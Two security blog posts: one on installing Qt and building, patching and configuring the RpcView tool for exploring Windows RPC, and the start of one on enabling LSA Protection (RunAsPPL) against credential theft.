Installing Qt

At the time of writing, the README specifies that the version of Qt used by the project is 5.15.2. I highly recommend using the exact same version, otherwise you will likely get into trouble during the compilation phase.



The question is how do you find and download Qt5 5.15.2? That’s where things get tricky because the process is a bit convoluted. First, you need to register an account here. This will allow you to use their custom web installer. Then, you need to download the installer here.



Once you have started the installer, it will prompt you to log in with your Qt account.



After that, you can leave everything as default. However, at the “Select Components” step, make sure to select Qt 5.15.2 for MSVC 2019 32 & 64 bits only. That’s already 2.37 GB of data to download, but if you select everything, that represents around 60 GB. :open_mouth:

If you are lucky enough, the installer should run flawlessly, but if you are not, you will probably encounter an error similar to the one below. At the time of writing, an issue is currently open on their bug tracker here, but they don’t seem to be in a hurry to fix it.

To solve this problem, I wrote a quick and dirty PowerShell script that downloads all the required files directly from the closest Qt mirror. That’s probably against the terms of use, but hey, what can you do?! I just wanted to get the job done.

If you leave all the values as default, the script will download and extract all the required files for Visual Studio 2019 (32 & 64 bits) in C:\Qt\5.15.2\.

Note: make sure 7-Zip is installed before running this script!

# Update these settings according to your needs but the default values should be just fine.
$DestinationFolder = "C:\Qt"
$QtVersion = "qt5_5152"
$Target = "msvc2019"
$BaseUrl = "https://download.qt.io/online/qtsdkrepository/windows_x86/desktop"
$7zipPath = "C:\Program Files\7-Zip\7z.exe"

# Store all the 7z archives in a Temp folder.
$TempFolder = Join-Path -Path $DestinationFolder -ChildPath "Temp"
$null = [System.IO.Directory]::CreateDirectory($TempFolder)

# Build the URLs for all the required components.
$AllUrls = @("$($BaseUrl)/tools_qtcreator", "$($BaseUrl)/$($QtVersion)_src_doc_examples", "$($BaseUrl)/$($QtVersion)")

# For each URL, retrieve and parse the "Updates.xml" file. This file contains all the information
# we need to download all the required files.
foreach ($Url in $AllUrls) {
    $UpdateXmlUrl = "$($Url)/Updates.xml"
    $UpdateXml = [xml](New-Object Net.WebClient).DownloadString($UpdateXmlUrl)
    foreach ($PackageUpdate in $UpdateXml.GetElementsByTagName("PackageUpdate")) {
        # Only keep the archives of the packages that match the selected target.
        $DownloadableArchives = @()
        if ($PackageUpdate.Name -like "*$($Target)*") {
            $DownloadableArchives += $PackageUpdate.DownloadableArchives.Split(",") | ForEach-Object { $_.Trim() } | Where-Object { -not [string]::IsNullOrEmpty($_) }
        }
        $DownloadableArchives | Sort-Object -Unique | ForEach-Object {
            $Filename = "$($PackageUpdate.Version)$($_)"
            $TempFile = Join-Path -Path $TempFolder -ChildPath $Filename
            $DownloadUrl = "$($Url)/$($PackageUpdate.Name)/$($Filename)"
            # Skip the download if the archive is already present in the Temp folder.
            if (Test-Path -Path $TempFile) {
                Write-Host "File $($Filename) found in Temp folder!"
            }
            else {
                Write-Host "Downloading $($Filename) ..."
                (New-Object Net.WebClient).DownloadFile($DownloadUrl, $TempFile)
            }
            Write-Host "Extracting file $($Filename) ..."
            &"$($7zipPath)" x -o"$($DestinationFolder)" $TempFile | Out-Null
        }
    }
}
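To make the logic of the script easier to follow, here is a minimal Python sketch of its core step: reading an Updates.xml document and deriving the archive URLs for a given target. The function name archive_urls, the sample XML, the archive names and the example.invalid base URL are all made up for illustration; only the element names (PackageUpdate, Name, Version, DownloadableArchives) and the URL layout come from the script above.

```python
import xml.etree.ElementTree as ET

# Hypothetical sample: the structure mirrors what the script reads,
# but the package and archive names are invented for this example.
SAMPLE_UPDATES_XML = """<Updates>
  <PackageUpdate>
    <Name>qt.qt5.5152.win64_msvc2019_64</Name>
    <Version>5.15.2-0-202011130602</Version>
    <DownloadableArchives>qttools-example.7z, qtbase-example.7z</DownloadableArchives>
  </PackageUpdate>
  <PackageUpdate>
    <Name>qt.qt5.5152.win64_mingw81</Name>
    <Version>5.15.2-0-202011130602</Version>
    <DownloadableArchives>qtbase-mingw-example.7z</DownloadableArchives>
  </PackageUpdate>
  <PackageUpdate>
    <Name>qt.qt5.5152.win32_msvc2019</Name>
    <Version>5.15.2-0-202011130602</Version>
    <DownloadableArchives></DownloadableArchives>
  </PackageUpdate>
</Updates>"""


def archive_urls(updates_xml: str, base_url: str, target: str = "msvc2019") -> list:
    """Return the download URLs of all archives whose package name contains `target`."""
    urls = []
    root = ET.fromstring(updates_xml)
    for package in root.iter("PackageUpdate"):
        name = package.findtext("Name", default="")
        # Same filter as the PowerShell -like "*msvc2019*" (case-insensitive).
        if target.lower() not in name.lower():
            continue
        version = package.findtext("Version", default="")
        archives = package.findtext("DownloadableArchives", default="") or ""
        # Split the comma-separated list, drop empty entries and duplicates.
        unique = sorted({a.strip() for a in archives.split(",") if a.strip()})
        for archive in unique:
            # The file name on the mirror is the version string followed by the archive name.
            urls.append(f"{base_url}/{name}/{version}{archive}")
    return urls


for url in archive_urls(SAMPLE_UPDATES_XML, "https://example.invalid/qt5_5152"):
    print(url)
```

The sketch only builds the URLs; downloading and extracting the archives is left to the PowerShell script.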

Building RpcView

We should be ready to go. One last piece is missing though: the RPC runtime version. When I first tried to build RpcView from the source files, I was a bit confused and I didn’t really know which version number was expected, but it’s actually very simple (once you know what to look for…).



You just have to open the properties of the file C:\Windows\System32\rpcrt4.dll and get the File Version. In my case, it’s 10.0.19041.1081.

Then, you can download the source code.

git clone https://github.com/silverf0x/RpcView

After that, we have to edit both .\RpcView\RpcCore\RpcCore4_64bits\RpcInternals.h and .\RpcView\RpcCore\RpcCore4_32bits\RpcInternals.h. At the beginning of this file, there is a static array that contains all the supported runtime versions.

static UINT64 RPC_CORE_RUNTIME_VERSION[] = {
    0x6000324D70000LL, //6.3.9431.0000
    0x6000325804000LL, //6.3.9600.16384
    ...
    0xA00004A6102EALL, //10.0.19041.746
    0xA00004A61041CLL, //10.0.19041.1052
};

We can see that each version number is represented as a 64-bit integer (long long), in which each of the four fields occupies 16 bits. For example, the version 10.0.19041.1052 translates to:

0xA00004A61041C = 0x000A (10) || 0x0000 (0) || 0x4A61 (19041) || 0x041C (1052)

If we apply the same conversion to the version number 10.0.19041.1081, we get the following result.

static UINT64 RPC_CORE_RUNTIME_VERSION[] = {
    0x6000324D70000LL, //6.3.9431.0000
    0x6000325804000LL, //6.3.9600.16384
    ...
    0xA00004A6102EALL, //10.0.19041.746
    0xA00004A61041CLL, //10.0.19041.1052
    0xA00004A610439LL, //10.0.19041.1081
};
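If you would rather not do the conversion by hand, it can be sketched in a few lines of Python. The two helper names below are hypothetical (they are not part of RpcView); the code simply packs the four 16-bit fields of the file version into a single 64-bit value, as described above.

```python
def encode_runtime_version(version: str) -> int:
    """Pack a dotted 'major.minor.build.revision' string into one 64-bit integer."""
    parts = [int(p) for p in version.split(".")]
    if len(parts) != 4 or any(not 0 <= p <= 0xFFFF for p in parts):
        raise ValueError(f"expected four 16-bit fields, got {version!r}")
    major, minor, build, revision = parts
    # Each field occupies 16 bits, from the most significant (major) to the least (revision).
    return (major << 48) | (minor << 32) | (build << 16) | revision


def decode_runtime_version(value: int) -> str:
    """Reverse operation: turn the 64-bit value back into a dotted version string."""
    return ".".join(str((value >> shift) & 0xFFFF) for shift in (48, 32, 16, 0))


# Value to add to RPC_CORE_RUNTIME_VERSION for rpcrt4.dll version 10.0.19041.1081.
print(f"0x{encode_runtime_version('10.0.19041.1081'):X}LL")  # 0xA00004A610439LL
```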

Finally, we can generate the Visual Studio solution and build it. I will show only the 64-bit compilation process, but if you want to compile the 32-bit version, you can refer to the documentation. The process is very similar anyway.

For the next commands, I assume the following:

- Qt is installed in C:\Qt\5.15.2\.

- CMake is installed in C:\Program Files\CMake\.

- The current working directory is RpcView’s source folder (e.g.: C:\Users\lab-user\Downloads\RpcView\).

mkdir Build\x64

cd Build\x64

set CMAKE_PREFIX_PATH=C:\Qt\5.15.2\msvc2019_64\

"C:\Program Files\CMake\bin\cmake.exe" ../../ -A x64

"C:\Program Files\CMake\bin\cmake.exe" --build . --config Release

Once the build has completed, you can download the latest release from AppVeyor here, extract the files, and replace RpcCore4_64bits.dll and RpcCore4_32bits.dll with the versions that were compiled and copied to .\RpcView\Build\x64\bin\Release\.

If all went well, RpcView should finally be up and running! :tada:

Patching RpcView





If you followed along, you probably noticed that, in the end, we did all that just to add a numeric value to two DLLs. Of course, there is a more straightforward way to get the same result. We can just patch the existing DLLs and replace one of the existing values with our own runtime version.

To do so, I will open the two DLLs with HxD. We know that the value 0xA00004A61041C is present in both files, so we can try to locate it within the binary data. Values are stored using the little-endian byte ordering though, so we actually have to search for the hexadecimal pattern 1C04614A00000A00.

Here, we just have to replace the value 1C04 (0x041C = 1052) with 3904 (0x0439 = 1081) because the rest of the version number is the same (10.0.19041).
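The same search and replace can be sketched in Python instead of a hex editor. The helper names are hypothetical, and the check that the pattern occurs exactly once is a safety assumption of mine, not something RpcView guarantees. The struct module is only used to get the little-endian byte representation of the 64-bit value.

```python
import struct


def version_pattern(value: int) -> bytes:
    """Return the 8 bytes of a runtime version as stored in the DLL (little-endian)."""
    return struct.pack("<Q", value)


def patch_version(data: bytes, old: int, new: int) -> bytes:
    """Replace the single occurrence of `old` with `new` in the binary data."""
    old_bytes, new_bytes = version_pattern(old), version_pattern(new)
    count = data.count(old_bytes)
    if count != 1:
        # Assumption: refuse to patch if the pattern is missing or ambiguous.
        raise ValueError(f"expected exactly one occurrence, found {count}")
    return data.replace(old_bytes, new_bytes)


# Pattern to look for in the hex editor for version 10.0.19041.1052.
print(version_pattern(0xA00004A61041C).hex().upper())  # 1C04614A00000A00
```

To patch a real file, you would read it in binary mode, pass its content to patch_version, and write the result to a copy of the DLL rather than overwriting the original.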

After saving the two files, RpcView should be up and running. That’s a dirty hack, but it works and it’s way more effective than building the project from the source! :roll_eyes:

Update: Using the “Force” Flag

As it turns out, you don’t even need to go through all this trouble. RpcView has an undocumented /force command line flag that you can use to override the RPC runtime version check.

.\RpcView64\RpcView.exe /force

Honestly, I did not look at the code at all. Otherwise I would have probably seen this. Lesson learned. Thanks @Cr0Eax for bringing this to my attention (source: Twitter). Anyway, building it and patching it was a nice challenge I guess. :sweat_smile:

Initial Configuration

Now that RpcView is up and running, we need to tweak it a little bit in order to make it really usable.



The Refresh Rate

The first thing you want to do is lower the refresh rate, especially if you are running it inside a Virtual Machine. Setting it to 10 seconds is perfectly fine. You could even set this parameter to “manual”.

Symbols

On the screenshot below, we can see that there is a section that is supposed to list all the procedures or functions that are exposed through an RPC server, but it actually only contains addresses.



This isn’t very convenient, but there is a cool thing about most Windows binaries. Microsoft publishes their associated PDB (Program DataBase) file.

PDB is a proprietary file format (developed by Microsoft) for storing debugging information about a program (or, commonly, program modules such as a DLL or EXE) - source: Wikipedia

These symbols can be configured through the Options > Configure Symbols menu item. Here, I set it to srv*C:\SYMBOLS.

The only caveat is that RpcView is not able, unlike other tools, to download the PDB files automatically. So, we need to download them beforehand.

If you have downloaded the Windows 10 SDK, this step should be quite easy though. The SDK includes a tool called symchk.exe which allows you to fetch the PDB files for almost any EXE or DLL, directly from Microsoft’s servers. For example, the following command allows you to download the symbols for all the DLLs in C:\Windows\System32\.

cd "C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\"

symchk /s srv*c:\SYMBOLS*https://msdl.microsoft.com/download/symbols C:\Windows\System32\*.dll

Once the symbols have been downloaded, RpcView must be restarted. After that, you should see that the name of each function is resolved in the “Procedures” section. :ok_hand:
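If some names are still not resolved, it can help to check which PDB files actually made it into the local cache. The sketch below lists them, assuming the usual two-level symbol store layout (<store>\<name>.pdb\<signature>\<name>.pdb); both this layout assumption and the function name cached_pdbs are mine, so adapt them to what you see in C:\SYMBOLS.

```python
from pathlib import Path


def cached_pdbs(store: str) -> list:
    """List the PDB files present in a local symbol store such as C:\\SYMBOLS."""
    root = Path(store)
    if not root.is_dir():
        return []
    found = set()
    for pdb_dir in root.iterdir():
        # First level: one folder per PDB file name (e.g. rpcrt4.pdb).
        if not pdb_dir.is_dir() or pdb_dir.suffix.lower() != ".pdb":
            continue
        # Second level: one folder per signature, containing the PDB file itself.
        for signature_dir in pdb_dir.iterdir():
            if signature_dir.is_dir() and (signature_dir / pdb_dir.name).is_file():
                found.add(pdb_dir.name.lower())
                break
    return sorted(found)


if __name__ == "__main__":
    for name in cached_pdbs(r"C:\SYMBOLS"):
        print(name)
```

Keep in mind that the name of a PDB file does not always match the name of its DLL, so a missing entry is a hint rather than a definitive answer.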

Conclusion

This post is already longer than I initially anticipated, so I will end it there. If you are new to this, I think you already have all the basics to get started. The main benefit of a GUI-based tool such as RpcView is that you can very easily explore and visualize some internals and concepts that might be difficult to grasp otherwise.

If you liked this post, don’t hesitate to let me know on Twitter. I only scratched the surface here, but this could be the beginning of a series in which I explore Windows RPC. In the next part, I could explain how to interact with an RPC server. In particular, I think it would be a good idea to use PetitPotam as an example, and show how you can reproduce it, based on the information you can get from RpcView.

Links & Resources

- RpcView
https://rpcview.org/

- GitHub - PetitPotam by @topotam77
https://github.com/topotam/PetitPotam

- PacSec 2017 - A view into ALPC-RPC
https://hakril.net/slides/A_view_into_ALPC_RPC_pacsec_2017.pdf

Do You Really Know About LSA Protection (RunAsPPL)?

When it comes to protecting against credential theft on Windows, enabling LSA Protection (a.k.a. RunAsPPL) on LSASS may be considered as the very first recommendation to implement. But do you really know what a PPL is? In this post, I want to cover some core concepts about Protected Processes and also prepare the ground for a follow-up article that will be released in the coming days.

Introduction

When you think about it, RunAsPPL for LSASS is a true quick win. It is very easy to configure as the only thing you have to do is add a simple value in the registry and reboot. Like any other protection though, it is not bulletproof and it is not sufficient on its own, but it is still particularly efficient. Attackers will have to use some relatively advanced tricks if they want to work around it, which ultimately increases their chance of being detected.

Therefore, as a security consultant, this is one of the top recommendations I usually give to a client. However, from a client’s perspective, I noticed that this protection tends to be confused with Credential Guard, which is completely different. I think that this confusion comes from the fact that the latter seems to provide a more robust mechanism although Credential Guard and LSA Protection are actually complementary.

But of course, as a consultant, you have to explain these concepts if you want to convince a client that they should implement both recommendations. Some time ago, I had to give such an explanation so, without going into too much detail, I think I said something like this about LSA Protection: “only a digitally signed binary can access a protected process”. You probably noticed that this sentence does not make much sense. This is how I realized that I didn’t really know how Protected Processes worked. So, I did some research and I found some really interesting things along the way, which is why I wanted to write about it.

Disclaimer – Most of the concepts I discuss in this post are already covered by the official documentation and the book Windows Internals 7th edition (Part 1), which were my two main sources of information. The objective of this blog post is not to paraphrase them but rather to gather the information which I think is the most valuable from a security consultant’s perspective.

How to Enable LSA Protection (RunAsPPL)

As mentioned previously, RunAsPPL is very easy to enable. The procedure is detailed in the official documentation and has also been covered in many blog posts before.

If you want to enable it within a corporate environment, you should follow the procedure provided by Microsoft and create a Group Policy: Configuring Additional LSA Protection. But if you just want to enable it manually on a single machine, you just have to:



- open the Registry Editor (regedit.exe) as an Administrator;

- open the key HKLM\SYSTEM\CurrentControlSet\Control\Lsa;

- add the DWORD value RunAsPPL and set it to 1;

- reboot.

That’s it! You are done!
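If you have to repeat these manual steps on a few lab machines, the registry change can also be expressed as a .reg file. The following Python sketch only generates the text of such a file; the function name is hypothetical, and the key and value are the ones listed above.

```python
def runasppl_reg_file() -> str:
    """Return the content of a .reg file that sets RunAsPPL to 1 under the Lsa key."""
    lines = [
        "Windows Registry Editor Version 5.00",
        "",
        r"[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]",
        # DWORD values are written as 8 hexadecimal digits in .reg files.
        '"RunAsPPL"=dword:00000001',
        "",
    ]
    return "\r\n".join(lines)


print(runasppl_reg_file())
```

Saving this text as a .reg file and importing it from an elevated prompt (for instance with reg import) should have the same effect as the manual steps. A reboot is still required afterwards.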

Before applying this setting throughout an entire corporate environment, there are two particular cases to consider though. They are both described in the official documentation. If the answer to at least one of the two following questions is “yes” then you need to take some precautions.

- Do you use any third-party authentication module?

- Do you use UEFI and/or Secure Boot?



Third-party authentication module – If a third-party authentication module is required, such as in the case of a Smart Card Reader for example, you should make sure that it meets the requirements listed here: Protected process requirements for plug-ins or drivers. Basically, the module must be digitally signed with a Microsoft signature and it must comply with the Microsoft Security Development Lifecycle (SDL). The documentation also contains some instructions on how to set up an Audit Policy prior to the rollout phase to determine whether such a module would be blocked if RunAsPPL were enabled.